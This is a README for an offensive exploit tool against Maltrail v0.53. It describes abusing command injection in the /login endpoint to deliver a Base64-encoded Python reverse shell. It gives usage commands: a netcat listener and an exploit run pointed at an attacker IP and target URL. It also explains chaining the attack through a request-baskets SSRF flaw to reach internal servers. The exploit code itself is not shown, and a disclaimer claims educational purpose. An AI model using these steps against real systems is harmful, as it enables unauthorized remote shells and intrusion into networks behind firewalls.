## https://sploitus.com/exploit?id=C4FFB8B8-CAED-5ACE-86BF-B3CFDF61DD14
# Maltrail v0.53 โ Command Injection Exploit
I wrote this exploit to abuse a **command injection** vulnerability in Maltrail v0.53. The `/login` endpoint passes unsanitized user input directly into a system command, which makes it possible to execute arbitrary OS commands on the server.
## How it works
The exploit sends a crafted POST request to the `/login` endpoint with a malicious `username` parameter. The payload contains a Base64-encoded Python reverse shell one-liner that gets decoded and executed on the target, giving me an interactive shell back to my listener.
## Requirements
- Python 3
- `curl` (used by the exploit to send the request)
## Usage
```
python3 exploit.py
```
### Example
```bash
# Set up a listener on your machine
nc -lvnp 4444
# Run the exploit
python3 exploit.py 10.0.0.5 4444 http://target.local:8338
```
The exploit will:
1. Encode a Python reverse shell payload in Base64
2. Send it to `http://target.local:8338/login` via curl
3. Your netcat listener receives the shell
## Disclaimer
I built this tool for educational purposes and authorized security testing only. Do not use it against systems without explicit permission.
---
## Chain with
This exploit expects Maltrail to be reachable from your position. If it's running on an internal network or behind a firewall, I use [CVE-2023-27163]() to reach it through an SSRF tunnel โ the request-baskets server forwards the malicious payload to the internal Maltrail instance, and the reverse shell comes back to me.# Maltrail-v0.53-Exploit